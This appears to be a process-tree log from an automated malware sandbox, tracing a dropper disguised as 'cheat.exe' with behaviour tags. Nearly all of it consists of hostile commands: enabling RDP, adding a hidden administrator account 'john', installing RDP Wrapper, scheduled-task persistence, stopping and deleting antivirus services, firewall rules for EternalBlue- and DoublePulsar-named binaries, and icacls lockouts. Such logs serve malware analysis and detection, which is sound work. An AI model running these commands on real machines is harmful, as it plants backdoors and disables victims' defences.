C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "9⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵
- Hide Artifacts: Hidden Users
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1235⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\77D1.tmp\77E2.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat5⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK6⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK6⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer3⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer3⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle3⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_643⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_644⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql3⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
